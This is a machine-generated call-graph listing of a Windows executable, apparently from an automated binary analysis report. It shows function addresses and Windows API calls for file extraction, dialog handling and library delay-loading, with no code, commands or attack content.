7ff70ecd1c80 33 API calls 21016->21020 21019 7ff70ecd4409 21017->21019 21021 7ff70ecd44c4 21018->21021 21022 7ff70ecd4446 21019->21022 21023 7ff70ecd440d CreateFileW 21019->21023 21020->21015 21021->20932 21021->20934 21022->21016 21024 7ff70ecd44d8 21022->21024 21023->21022 21025 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21024->21025 21026 7ff70ecd44dd 21025->21026 21027->20925 21034 7ff70ecd492d _snwprintf 21028->21034 21029 7ff70ecd4959 21031 7ff70ecf5c30 _handle_error 8 API calls 21029->21031 21030 7ff70ecd4a34 SetFilePointer 21030->21029 21033 7ff70ecd4a5c GetLastError 21030->21033 21032 7ff70ecd49c1 21031->21032 21032->20941 21035 7ff70ecd3eac 99 API calls std::_Xinvalid_argument 21032->21035 21033->21029 21034->21029 21034->21030 21038 7ff70ece62eb memcpy_s 21036->21038 21037 7ff70ece511c 120 API calls 21037->21038 21038->21037 21040 7ff70ece633d 21038->21040 21039 7ff70ece511c 120 API calls 21039->21040 21040->21039 21042 7ff70ece639f 21040->21042 21056 7ff70ece650a 21040->21056 21041 7ff70ecf5c30 _handle_error 8 API calls 21044 7ff70ece697b 21041->21044 21043 7ff70ece511c 120 API calls 21042->21043 21047 7ff70ece63f8 21042->21047 21042->21056 21043->21042 21044->20945 21045 7ff70ece64a2 21077 7ff70ece569c 21045->21077 21047->21045 21048 7ff70ece511c 120 API calls 21047->21048 21047->21056 21048->21047 21049 7ff70ece674c 21050 7ff70ece569c 8 API calls 21049->21050 21051 7ff70ece67c0 21050->21051 21054 7ff70ece569c 8 API calls 21051->21054 21051->21056 21052 7ff70ece6500 21052->21049 21053 7ff70ece511c 120 API calls 21052->21053 21052->21056 21053->21052 21055 7ff70ece6896 21054->21055 21055->21056 21081 7ff70ece5e44 21055->21081 21056->21041 21061 7ff70ece6ba8 21058->21061 21059 7ff70ece6bdf 21062 7ff70ece511c 120 API calls 21059->21062 21063 7ff70ece6bee 21059->21063 21065 7ff70ece6c2d 21059->21065 21060 7ff70ece511c 120 API calls 21060->21061 21061->21059 21061->21060 21062->21059 21063->20945 21064 7ff70ece511c 120 API calls 21064->21065 21065->21063 21065->21064 21066 7ff70ece4d74 104 API calls 21065->21066 21066->21065 21068 7ff70ecd4d89 21067->21068 21069 7ff70ecd4d6d 21067->21069 21070 7ff70ecd4d9b 21068->21070 21072 7ff70ecd4da1 SetFilePointer 21068->21072 21069->21070 21086 7ff70ecd3eac 99 API calls std::_Xinvalid_argument 21069->21086 21070->20945 21072->21070 21073 7ff70ecd4dbe GetLastError 21072->21073 21073->21070 21074 7ff70ecd4dc8 21073->21074 21074->21070 21087 7ff70ecd3eac 99 API calls std::_Xinvalid_argument 21074->21087 21076->20945 21080 7ff70ece56fe memcpy_s 21077->21080 21078 7ff70ecf5c30 _handle_error 8 API calls 21079 7ff70ece5ae9 21078->21079 21079->21052 21080->21078 21084 7ff70ece5ea7 21081->21084 21082 7ff70ece6260 21082->21056 21083 7ff70ece511c 120 API calls 21083->21084 21084->21082 21084->21083 21085 7ff70ece4d74 104 API calls 21084->21085 21085->21084 21089 7ff70ecd4c94 21088->21089 21092 7ff70ecd4ca4 21088->21092 21090 7ff70ecd4c9a FlushFileBuffers 21089->21090 21089->21092 21090->21092 21091 7ff70ecd4d0e SetFileTime 21091->20960 21092->21091 21094 7ff70ecd4302 21093->21094 21095 7ff70ecd42ea 21093->21095 21096 7ff70ecd4326 21094->21096 21113 7ff70ecd3a64 99 API calls 21094->21113 21095->21094 21097 7ff70ecd42f6 CloseHandle 21095->21097 21096->20958 21097->21094 21100 7ff70ecd601b 21099->21100 21101 7ff70ecd601e SetFileAttributesW 21099->21101 21100->21101 21102 7ff70ecd6034 21101->21102 21103 7ff70ecd60b5 21101->21103 21105 7ff70ecd80b0 49 API calls 21102->21105 21104 7ff70ecf5c30 _handle_error 8 API calls 21103->21104 21107 7ff70ecd60ca 21104->21107 21106 7ff70ecd6059 21105->21106 21108 7ff70ecd607c 21106->21108 21109 7ff70ecd605d SetFileAttributesW 21106->21109 21107->20959 21108->21103 21110 7ff70ecd60da 21108->21110 21109->21108 21111 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21110->21111 21112 7ff70ecd60df 21111->21112 21113->21096 21116 7ff70ecd5c8f 21114->21116 21115 7ff70ecd5cbc 21134 7ff70ecd5890 21115->21134 21116->21115 21117 7ff70ecd5ca8 CreateDirectoryW 21116->21117 21117->21115 21119 7ff70ecd5d59 21117->21119 21121 7ff70ecd5d69 21119->21121 21123 7ff70ecd5ff4 51 API calls 21119->21123 21125 7ff70ecf5c30 _handle_error 8 API calls 21121->21125 21122 7ff70ecd5d6d GetLastError 21122->21121 21123->21121 21124 7ff70ecd80b0 49 API calls 21126 7ff70ecd5cf8 21124->21126 21127 7ff70ecd5d95 21125->21127 21128 7ff70ecd5cfc CreateDirectoryW 21126->21128 21129 7ff70ecd5d17 21126->21129 21127->20971 21128->21129 21130 7ff70ecd5d50 21129->21130 21131 7ff70ecd5daa 21129->21131 21130->21119 21130->21122 21132 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21131->21132 21133 7ff70ecd5daf 21132->21133 21135 7ff70ecd58bb GetFileAttributesW 21134->21135 21136 7ff70ecd58b8 21134->21136 21137 7ff70ecd58cc 21135->21137 21138 7ff70ecd5949 21135->21138 21136->21135 21139 7ff70ecd80b0 49 API calls 21137->21139 21140 7ff70ecf5c30 _handle_error 8 API calls 21138->21140 21141 7ff70ecd58f3 21139->21141 21142 7ff70ecd595d 21140->21142 21143 7ff70ecd5910 21141->21143 21144 7ff70ecd58f7 GetFileAttributesW 21141->21144 21142->21122 21142->21124 21143->21138 21145 7ff70ecd596d 21143->21145 21144->21143 21146 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21145->21146 21147 7ff70ecd5972 21146->21147 21178 7ff70ecd4a70 21148->21178 21149 7ff70ecf5c30 _handle_error 8 API calls 21150 7ff70ece5176 21149->21150 21150->20995 21150->20997 21150->20998 21152 7ff70ecd6288 55 API calls 21153 7ff70ece5483 21152->21153 21154 7ff70ece5501 21153->21154 21155 7ff70ece54ab 21153->21155 21156 7ff70ece54ff 21154->21156 21230 7ff70ece1dd0 21154->21230 21155->21156 21183 7ff70ece1bf4 21155->21183 21241 7ff70ece4e68 21156->21241 21160 7ff70ece54bc 21161 7ff70ecd12bc 33 API calls 21160->21161 21163 7ff70ece54f3 21161->21163 21162 7ff70ece553b 21165 7ff70ecd12bc 33 API calls 21162->21165 21173 7ff70ece558f 21162->21173 21214 7ff70ecd8d18 21163->21214 21164 7ff70ece568f 21167 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21164->21167 21168 7ff70ece557b 21165->21168 21169 7ff70ece5694 21167->21169 21248 7ff70ece0114 21168->21248 21171 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21169->21171 21172 7ff70ece569a 21171->21172 21173->21164 21173->21169 21174 7ff70ece5621 21173->21174 21174->21149 21177->20998 21179 7ff70ecd4a96 21178->21179 21180 7ff70ecd4a9d 21178->21180 21179->21152 21179->21174 21180->21179 21181 7ff70ecd4520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21180->21181 21264 7ff70ecd3d8c 99 API calls std::_Xinvalid_argument 21180->21264 21181->21180 21265 7ff70ecd7af8 47 API calls 21183->21265 21185 7ff70ece1c2e 21186 7ff70ecd12bc 33 API calls 21185->21186 21187 7ff70ece1c5a 21186->21187 21266 7ff70ece0aa0 CompareStringW 21187->21266 21189 7ff70ece1c82 21190 7ff70ecd12bc 33 API calls 21189->21190 21195 7ff70ece1cdc 21189->21195 21192 7ff70ece1cb1 21190->21192 21191 7ff70ecd1b70 31 API calls 21193 7ff70ece1d9a 21191->21193 21267 7ff70ece0ad0 CompareStringW 21192->21267 21198 7ff70ecf5c30 _handle_error 8 API calls 21193->21198 21194 7ff70ece1dc7 21199 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21194->21199 21195->21194 21196 7ff70ece1d7b 21195->21196 21200 7ff70ece1dc2 21195->21200 21196->21191 21201 7ff70ece1da9 21198->21201 21203 7ff70ece1dcd 21199->21203 21202 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21200->21202 21201->21160 21202->21194 21204 7ff70ece1bf4 64 API calls 21203->21204 21205 7ff70ece1df9 21204->21205 21268 7ff70ecd61e8 21205->21268 21207 7ff70ece1e2a 21208 7ff70ecd12bc 33 API calls 21207->21208 21209 7ff70ece1e55 21208->21209 21210 7ff70ecd8d18 47 API calls 21209->21210 21211 7ff70ece1e62 21210->21211 21212 7ff70ecf5c30 _handle_error 8 API calls 21211->21212 21213 7ff70ece1e72 21212->21213 21213->21160 21215 7ff70ecd8d41 21214->21215 21216 7ff70ecd8d4d 21215->21216 21218 7ff70ecd8dbe 21215->21218 21272 7ff70ecd6e5c 21216->21272 21280 7ff70ecd353c 47 API calls 21218->21280 21222 7ff70ecd1c04 33 API calls 21223 7ff70ecd8d92 21222->21223 21224 7ff70ecd1b70 31 API calls 21223->21224 21225 7ff70ecd8d9d 21224->21225 21226 7ff70ecd1b70 31 API calls 21225->21226 21227 7ff70ecd8da6 21226->21227 21228 7ff70ecf5c30 _handle_error 8 API calls 21227->21228 21229 7ff70ecd8db3 21228->21229 21229->21156 21231 7ff70ece1bf4 64 API calls 21230->21231 21232 7ff70ece1df9 21231->21232 21233 7ff70ecd61e8 swprintf 46 API calls 21232->21233 21234 7ff70ece1e2a 21233->21234 21235 7ff70ecd12bc 33 API calls 21234->21235 21236 7ff70ece1e55 21235->21236 21237 7ff70ecd8d18 47 API calls 21236->21237 21238 7ff70ece1e62 21237->21238 21239 7ff70ecf5c30 _handle_error 8 API calls 21238->21239 21240 7ff70ece1e72 21239->21240 21240->21156 21242 7ff70ecf5ae0 4 API calls 21241->21242 21243 7ff70ece4e76 21242->21243 21282 7ff70ecd46a0 21243->21282 21245 7ff70ece4ed4 21245->21162 21249 7ff70ecf3bf8 21248->21249 21301 7ff70ecd8b28 21249->21301 21252 7ff70ecdaee0 48 API calls 21253 7ff70ecf3c3f 21252->21253 21254 7ff70ecdda04 48 API calls 21253->21254 21255 7ff70ecf3c4f 21254->21255 21256 7ff70ecd1b70 31 API calls 21255->21256 21257 7ff70ecf3c5a 21256->21257 21309 7ff70ecf376c 21257->21309 21260 7ff70ecd1b70 31 API calls 21261 7ff70ecf3c7b 21260->21261 21262 7ff70ecf5c30 _handle_error 8 API calls 21261->21262 21263 7ff70ecf3c88 21262->21263 21263->21173 21265->21185 21266->21189 21267->21195 21269 7ff70ecd620d _snwprintf 21268->21269 21270 7ff70ecfd348 swprintf 46 API calls 21269->21270 21271 7ff70ecd6229 21270->21271 21271->21207 21273 7ff70ecd6e7c 21272->21273 21274 7ff70ecd6e95 21273->21274 21275 7ff70ecd6ed6 21273->21275 21278 7ff70ecd7050 4 API calls 21274->21278 21281 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21275->21281 21279 7ff70ecd6ec3 21278->21279 21279->21222 21283 7ff70ecd46dd CreateFileW 21282->21283 21285 7ff70ecd478e GetLastError 21283->21285 21294 7ff70ecd484e 21283->21294 21286 7ff70ecd80b0 49 API calls 21285->21286 21287 7ff70ecd47bc 21286->21287 21288 7ff70ecd47c0 CreateFileW GetLastError 21287->21288 21293 7ff70ecd480c 21287->21293 21288->21293 21289 7ff70ecd48e8 21291 7ff70ecf5c30 _handle_error 8 API calls 21289->21291 21290 7ff70ecd4891 SetFileTime 21292 7ff70ecd48af 21290->21292 21295 7ff70ecd48fb 21291->21295 21292->21289 21296 7ff70ecd1c80 33 API calls 21292->21296 21293->21294 21297 7ff70ecd4916 21293->21297 21294->21290 21294->21292 21295->21245 21300 7ff70ecd3cd0 100 API calls 2 library calls 21295->21300 21296->21289 21298 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21297->21298 21299 7ff70ecd491b 21298->21299 21300->21245 21302 7ff70ecd8b40 21301->21302 21303 7ff70ecd8b57 21302->21303 21304 7ff70ecd8b89 21302->21304 21306 7ff70ecd12bc 33 API calls 21303->21306 21321 7ff70ecd353c 47 API calls 21304->21321 21308 7ff70ecd8b7b 21306->21308 21308->21252 21310 7ff70ecf3798 21309->21310 21311 7ff70ecd12bc 33 API calls 21310->21311 21312 7ff70ecf37a8 21311->21312 21322 7ff70ecf2bf4 21312->21322 21315 7ff70ecf37ef 21316 7ff70ecf5c30 _handle_error 8 API calls 21315->21316 21318 7ff70ecf3801 21316->21318 21317 7ff70ecf3807 21319 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21317->21319 21318->21260 21320 7ff70ecf380c 21319->21320 21336 7ff70ecee96c PeekMessageW 21322->21336 21325 7ff70ecf2c45 21329 7ff70ecf2c51 ShowWindow SendMessageW SendMessageW 21325->21329 21326 7ff70ecf2c93 SendMessageW SendMessageW 21327 7ff70ecf2cf4 SendMessageW 21326->21327 21328 7ff70ecf2cd9 21326->21328 21330 7ff70ecf2d16 SendMessageW SendMessageW 21327->21330 21331 7ff70ecf2d13 21327->21331 21328->21327 21329->21326 21332 7ff70ecf2d43 SendMessageW 21330->21332 21333 7ff70ecf2d68 SendMessageW 21330->21333 21331->21330 21332->21333 21334 7ff70ecf5c30 _handle_error 8 API calls 21333->21334 21335 7ff70ecf2d8c 21334->21335 21335->21315 21335->21317 21337 7ff70ecee9d0 GetDlgItem 21336->21337 21338 7ff70ecee98c GetMessageW 21336->21338 21337->21325 21337->21326 21339 7ff70ecee9ab IsDialogMessageW 21338->21339 21340 7ff70ecee9ba TranslateMessage DispatchMessageW 21338->21340 21339->21337 21339->21340 21340->21337 21342 7ff70ecd4e4b 21341->21342 21356 7ff70ecd4e44 21341->21356 21343 7ff70ecd4e55 GetStdHandle 21342->21343 21349 7ff70ecd4e63 21342->21349 21343->21349 21344 7ff70ecf5c30 _handle_error 8 API calls 21345 7ff70ecd4fee 21344->21345 21345->21004 21346 7ff70ecd4ebe WriteFile 21346->21349 21347 7ff70ecd4e7e WriteFile 21348 7ff70ecd4eb4 21347->21348 21347->21349 21348->21347 21348->21349 21349->21346 21349->21347 21351 7ff70ecd4f56 21349->21351 21349->21356 21360 7ff70ecd3a18 101 API calls 21349->21360 21352 7ff70ecd12bc 33 API calls 21351->21352 21353 7ff70ecd4f85 21352->21353 21361 7ff70ecd4190 99 API calls std::_Xinvalid_argument 21353->21361 21356->21344 21360->21349 22362 7ff70ed00e5c 22363 7ff70ed00ea7 22362->22363 22368 7ff70ed00e6b abort 22362->22368 22370 7ff70ed00bac 15 API calls abort 22363->22370 22364 7ff70ed00e8e HeapAlloc 22366 7ff70ed00ea5 22364->22366 22364->22368 22368->22363 22368->22364 22369 7ff70ecff0c8 EnterCriticalSection LeaveCriticalSection abort 22368->22369 22369->22368 22370->22366 20599 7ff70ecf4f32 20602 7ff70ecf5390 20599->20602 20628 7ff70ecf4fe8 20602->20628 20605 7ff70ecf541b 20606 7ff70ecf52f8 DloadReleaseSectionWriteAccess 6 API calls 20605->20606 20607 7ff70ecf5428 RaiseException 20606->20607 20608 7ff70ecf4f71 20607->20608 20609 7ff70ecf54cd LoadLibraryExA 20612 7ff70ecf54e4 GetLastError 20609->20612 20613 7ff70ecf5539 20609->20613 20610 7ff70ecf5444 20610->20609 20611 7ff70ecf5615 20610->20611 20610->20613 20615 7ff70ecf554d 20610->20615 20636 7ff70ecf52f8 20611->20636 20617 7ff70ecf550e 20612->20617 20618 7ff70ecf54f9 20612->20618 20614 7ff70ecf5544 FreeLibrary 20613->20614 20613->20615 20614->20615 20615->20611 20616 7ff70ecf55ab GetProcAddress 20615->20616 20616->20611 20619 7ff70ecf55c0 GetLastError 20616->20619 20621 7ff70ecf52f8 DloadReleaseSectionWriteAccess 6 API calls 20617->20621 20618->20613 20618->20617 20623 7ff70ecf55d5 20619->20623 20622 7ff70ecf551b RaiseException 20621->20622 20622->20608 20623->20611 20624 7ff70ecf52f8 DloadReleaseSectionWriteAccess 6 API calls 20623->20624 20625 7ff70ecf55f7 RaiseException 20624->20625 20626 7ff70ecf4fe8 DloadAcquireSectionWriteAccess 6 API calls 20625->20626 20627 7ff70ecf5611 20626->20627 20627->20611 20629 7ff70ecf4ffe 20628->20629 20635 7ff70ecf5063 20628->20635 20644 7ff70ecf5094 20629->20644 20632 7ff70ecf505e 20634 7ff70ecf5094 DloadReleaseSectionWriteAccess 3 API calls 20632->20634 20634->20635 20635->20605 20635->20610 20637 7ff70ecf5308 20636->20637 20643 7ff70ecf5361 20636->20643 20638 7ff70ecf5094 DloadReleaseSectionWriteAccess 3 API calls 20637->20638 20639 7ff70ecf530d 20638->20639 20640 7ff70ecf535c 20639->20640 20641 7ff70ecf5268 DloadProtectSection 3 API calls 20639->20641 20642 7ff70ecf5094 DloadReleaseSectionWriteAccess 3 API calls 20640->20642 20641->20640 20642->20643 20643->20608 20645 7ff70ecf5003 20644->20645 20646 7ff70ecf50af 20644->20646 20645->20632 20651 7ff70ecf5268 20645->20651 20646->20645 20647 7ff70ecf50b4 GetModuleHandleW 20646->20647 20648 7ff70ecf50ce GetProcAddress 20647->20648 20649 7ff70ecf50c9 20647->20649 20648->20649 20650 7ff70ecf50e3 GetProcAddress 20648->20650 20649->20645 20650->20649 20653 7ff70ecf528a DloadProtectSection 20651->20653 20652 7ff70ecf5292 20652->20632 20653->20652 20654 7ff70ecf52ca VirtualProtect 20653->20654 20656 7ff70ecf5134 VirtualQuery GetSystemInfo 20653->20656 20654->20652 20656->20654 20711 7ff70ecf4f2d 20713 7ff70ecf4e65 20711->20713 20712 7ff70ecf5390 _com_raise_error 14 API calls 20712->20713 20713->20711 20713->20712 20735 7ff70ece0120 20736 7ff70ecf3c98 20735->20736 20737 7ff70ecf3d4f 20736->20737 20738 7ff70ecf3cd7 20736->20738 20740 7ff70ecdaee0 48 API calls 20737->20740 20764 7ff70ecdaee0 20738->20764 20742 7ff70ecf3d63 20740->20742 20744 7ff70ecdda04 48 API calls 20742->20744 20748 7ff70ecf3cfa memcpy_s 20744->20748 20745 7ff70ecd1b70 31 API calls 20746 7ff70ecf3df9 20745->20746 20761 7ff70ecd210c 20746->20761 20747 7ff70ecf3e84 20751 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20747->20751 20748->20745 20748->20747 20760 7ff70ecf3e7e 20748->20760 20750 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20750->20747 20753 7ff70ecf3e8a 20751->20753 20760->20750 20762 7ff70ecd2113 20761->20762 20763 7ff70ecd2116 SetDlgItemTextW 20761->20763 20762->20763 20765 7ff70ecdaef3 20764->20765 20774 7ff70ecd9b74 20765->20774 20768 7ff70ecdaf86 20771 7ff70ecdda04 20768->20771 20769 7ff70ecdaf58 LoadStringW 20769->20768 20770 7ff70ecdaf71 LoadStringW 20769->20770 20770->20768 20800 7ff70ecdd7e0 20771->20800 20781 7ff70ecd9a38 20774->20781 20777 7ff70ecd9bd9 20779 7ff70ecf5c30 _handle_error 8 API calls 20777->20779 20780 7ff70ecd9bf2 20779->20780 20780->20768 20780->20769 20782 7ff70ecd9a92 20781->20782 20790 7ff70ecd9b30 20781->20790 20786 7ff70ecd9ac0 20782->20786 20795 7ff70ece0688 WideCharToMultiByte 20782->20795 20784 7ff70ecf5c30 _handle_error 8 API calls 20785 7ff70ecd9b64 20784->20785 20785->20777 20791 7ff70ecd9c00 20785->20791 20789 7ff70ecd9aef 20786->20789 20797 7ff70ecdae88 45 API calls _snwprintf 20786->20797 20798 7ff70ecfd62c 31 API calls 2 library calls 20789->20798 20790->20784 20792 7ff70ecd9c40 20791->20792 20794 7ff70ecd9c69 20791->20794 20799 7ff70ecfd62c 31 API calls 2 library calls 20792->20799 20794->20777 20796 7ff70ece06ca 20795->20796 20796->20786 20797->20789 20798->20790 20799->20794 20816 7ff70ecdd43c 20800->20816 20805 7ff70ecdd90f 20808 7ff70ecdd983 20805->20808 20810 7ff70ecdd9ab 20805->20810 20806 7ff70ecdd851 _snwprintf 20813 7ff70ecdd8e0 20806->20813 20830 7ff70ecfd348 20806->20830 20857 7ff70ecd3550 33 API calls 20806->20857 20809 7ff70ecf5c30 _handle_error 8 API calls 20808->20809 20811 7ff70ecdd997 20809->20811 20812 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20810->20812 20811->20748 20814 7ff70ecdd9b0 20812->20814 20813->20805 20858 7ff70ecd3550 33 API calls 20813->20858 20817 7ff70ecdd5d1 20816->20817 20818 7ff70ecdd46e 20816->20818 20820 7ff70ecdca1c 20817->20820 20818->20817 20819 7ff70ecd1734 33 API calls 20818->20819 20819->20818 20822 7ff70ecdca52 20820->20822 20827 7ff70ecdcb1c 20820->20827 20824 7ff70ecdcabc 20822->20824 20825 7ff70ecdcb17 20822->20825 20828 7ff70ecdca62 20822->20828 20824->20828 20829 7ff70ecf5ae0 4 API calls 20824->20829 20859 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20825->20859 20860 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 20827->20860 20828->20806 20829->20828 20831 7ff70ecfd3a6 20830->20831 20832 7ff70ecfd38e 20830->20832 20831->20832 20834 7ff70ecfd3b0 20831->20834 20861 7ff70ed00bac 15 API calls abort 20832->20861 20863 7ff70ecfb348 35 API calls 2 library calls 20834->20863 20835 7ff70ecfd393 20862 7ff70ecfae74 31 API calls _invalid_parameter_noinfo_noreturn 20835->20862 20838 7ff70ecf5c30 _handle_error 8 API calls 20840 7ff70ecfd563 20838->20840 20839 7ff70ecfd3c1 memcpy_s 20864 7ff70ecfb2c8 15 API calls memcpy_s 20839->20864 20840->20806 20842 7ff70ecfd42c 20865 7ff70ecfb750 46 API calls 3 library calls 20842->20865 20844 7ff70ecfd435 20845 7ff70ecfd43d 20844->20845 20847 7ff70ecfd46c 20844->20847 20866 7ff70ed00e1c 20845->20866 20848 7ff70ecfd4c4 20847->20848 20849 7ff70ecfd47b 20847->20849 20850 7ff70ecfd4ea 20847->20850 20851 7ff70ecfd472 20847->20851 20852 7ff70ed00e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 20848->20852 20854 7ff70ed00e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 20849->20854 20850->20848 20853 7ff70ecfd4f4 20850->20853 20851->20848 20851->20849 20856 7ff70ecfd39e 20852->20856 20855 7ff70ed00e1c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 20853->20855 20854->20856 20855->20856 20856->20838 20857->20806 20858->20805 20861->20835 20862->20856 20863->20839 20864->20842 20865->20844 20867 7ff70ed00e21 RtlFreeHeap 20866->20867 20871 7ff70ed00e51 Concurrency::details::SchedulerProxy::DeleteThis 20866->20871 20868 7ff70ed00e3c 20867->20868 20867->20871 20872 7ff70ed00bac 15 API calls abort 20868->20872 20870 7ff70ed00e41 GetLastError 20870->20871 20871->20856 20872->20870 22378 7ff70ecf4d50 22379 7ff70ecf4c83 22378->22379 22380 7ff70ecf5390 _com_raise_error 14 API calls 22379->22380 22380->22379 22396 7ff70ece9c49 8 API calls _handle_error 22413 7ff70ed09b30 22414 7ff70ed09b4e 22413->22414 22415 7ff70ecf7848 std::_Xinvalid_argument 2 API calls 22414->22415 22416 7ff70ed09b57 22415->22416 22429 7ff70ece0d80 31 API calls 22416->22429 22418 7ff70ed09b7c 22419 7ff70ecf7848 std::_Xinvalid_argument 2 API calls 22418->22419 22420 7ff70ed09b9c 22419->22420 22430 7ff70ece0db4 31 API calls 22420->22430 22422 7ff70ed09bbb 22431 7ff70ece22e8 22422->22431 22429->22418 22430->22422 22432 7ff70ece22ff 22431->22432 22433 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22432->22433 22434 7ff70ece2328 22433->22434 22435 7ff70ecd12bc 33 API calls 22434->22435 22436 7ff70ece23ff 22435->22436 22437 7ff70ece0114 83 API calls 22436->22437 22438 7ff70ece2413 22437->22438 22439 7ff70ecd1b70 31 API calls 22438->22439 22440 7ff70ece241d 22439->22440 22441 7ff70ecf5ae0 4 API calls 22440->22441 22442 7ff70ece2481 22441->22442 22447 7ff70ece12cc 31 API calls 22442->22447 22444 7ff70ece3d9a 22448 7ff70ece1a70 31 API calls _invalid_parameter_noinfo_noreturn 22444->22448 22446 7ff70ece3db2 22447->22444 22448->22446 22451 7ff70ecf653c 22474 7ff70ecf5fc4 22451->22474 22454 7ff70ecf6688 22590 7ff70ecf6940 7 API calls 2 library calls 22454->22590 22455 7ff70ecf6558 __scrt_acquire_startup_lock 22457 7ff70ecf6692 22455->22457 22462 7ff70ecf6576 __scrt_release_startup_lock 22455->22462 22591 7ff70ecf6940 7 API calls 2 library calls 22457->22591 22459 7ff70ecf659b 22460 7ff70ecf669d abort 22461 7ff70ecf6621 22482 7ff70ecf6a8c 22461->22482 22462->22459 22462->22461 22587 7ff70ecff530 35 API calls __GSHandlerCheck_EH 22462->22587 22464 7ff70ecf6626 22485 7ff70ed00200 22464->22485 22471 7ff70ecf6649 22471->22460 22589 7ff70ecf6158 7 API calls __scrt_initialize_crt 22471->22589 22473 7ff70ecf6660 22473->22459 22592 7ff70ecf6780 22474->22592 22477 7ff70ecf5ff3 22594 7ff70ed00130 22477->22594 22478 7ff70ecf5fef 22478->22454 22478->22455 22611 7ff70ecf74c0 22482->22611 22613 7ff70ed03bc0 22485->22613 22487 7ff70ed0020f 22489 7ff70ecf662e 22487->22489 22617 7ff70ed03f50 35 API calls swprintf 22487->22617 22490 7ff70ecf400c 22489->22490 22491 7ff70ecf4046 22490->22491 22492 7ff70ecd7a28 35 API calls 22491->22492 22493 7ff70ecf4052 22492->22493 22619 7ff70eced0a8 22493->22619 22495 7ff70ecf405c memcpy_s 22624 7ff70eced724 22495->22624 22497 7ff70ecf40d1 22499 7ff70ecf4226 GetCommandLineW 22497->22499 22561 7ff70ecf4694 22497->22561 22498 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22500 7ff70ecf469a 22498->22500 22501 7ff70ecf4238 22499->22501 22549 7ff70ecf43fa 22499->22549 22503 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22500->22503 22505 7ff70ecd12bc 33 API calls 22501->22505 22502 7ff70ecd7c10 34 API calls 22504 7ff70ecf4409 22502->22504 22514 7ff70ecf46a0 22503->22514 22508 7ff70ecd1b70 31 API calls 22504->22508 22512 7ff70ecf4420 memcpy_s 22504->22512 22507 7ff70ecf425d 22505->22507 22506 7ff70ecd1b70 31 API calls 22509 7ff70ecf444b SetEnvironmentVariableW GetLocalTime 22506->22509 22687 7ff70ecf0620 131 API calls 3 library calls 22507->22687 22508->22512 22513 7ff70ecd61e8 swprintf 46 API calls 22509->22513 22511 7ff70ecdbbf8 shared_ptr 31 API calls 22541 7ff70ecf471e 22511->22541 22512->22506 22517 7ff70ecf44d0 SetEnvironmentVariableW GetModuleHandleW LoadIconW 22513->22517 22514->22511 22515 7ff70ecf4949 22514->22515 22518 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22515->22518 22516 7ff70ecf4267 22516->22500 22521 7ff70ecf4393 22516->22521 22522 7ff70ecf42b1 OpenFileMappingW 22516->22522 22634 7ff70eceeb64 LoadBitmapW 22517->22634 22520 7ff70ecf4969 22518->22520 22528 7ff70ecf5390 _com_raise_error 14 API calls 22520->22528 22529 7ff70ecd12bc 33 API calls 22521->22529 22524 7ff70ecf42d1 MapViewOfFile 22522->22524 22525 7ff70ecf4388 CloseHandle 22522->22525 22524->22525 22526 7ff70ecf42f7 UnmapViewOfFile MapViewOfFile 22524->22526 22525->22549 22526->22525 22530 7ff70ecf4329 22526->22530 22532 7ff70ecf49b5 22528->22532 22533 7ff70ecf43b8 22529->22533 22688 7ff70ecedd08 33 API calls 2 library calls 22530->22688 22531 7ff70ecf452d 22658 7ff70ecea430 22531->22658 22692 7ff70ecf3810 35 API calls 2 library calls 22533->22692 22534 7ff70ecd1b70 31 API calls 22538 7ff70ecf48dd 22534->22538 22543 7ff70ecd1b70 31 API calls 22538->22543 22539 7ff70ecf4339 22689 7ff70ecf3810 35 API calls 2 library calls 22539->22689 22541->22515 22541->22534 22542 7ff70ecf43c2 22542->22549 22552 7ff70ecf468f 22542->22552 22546 7ff70ecf48e9 22543->22546 22545 7ff70ecea430 4 API calls 22548 7ff70ecf453f DialogBoxParamW 22545->22548 22550 7ff70ecd1b70 31 API calls 22546->22550 22547 7ff70ecf4348 22690 7ff70ecdbd30 131 API calls 22547->22690 22558 7ff70ecf458b 22548->22558 22549->22502 22553 7ff70ecf48f5 22550->22553 22557 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 22552->22557 22555 7ff70ecd1b70 31 API calls 22553->22555 22554 7ff70ecf435d 22691 7ff70ecdbe7c 131 API calls shared_ptr 22554->22691 22559 7ff70ecf4901 22555->22559 22557->22561 22562 7ff70ecf45a4 22558->22562 22563 7ff70ecf459e Sleep 22558->22563 22564 7ff70ecd1b70 31 API calls 22559->22564 22560 7ff70ecf4370 22567 7ff70ecf437f UnmapViewOfFile 22560->22567 22561->22498 22565 7ff70ecf45b2 shared_ptr 22562->22565 22661 7ff70ecedac4 22562->22661 22563->22562 22566 7ff70ecf490d 22564->22566 22570 7ff70ecf45be DeleteObject 22565->22570 22569 7ff70ecd1b70 31 API calls 22566->22569 22567->22525 22571 7ff70ecf4919 22569->22571 22572 7ff70ecf45dd 22570->22572 22573 7ff70ecf45d7 DeleteObject 22570->22573 22574 7ff70ecd1b70 31 API calls 22571->22574 22576 7ff70ecf4613 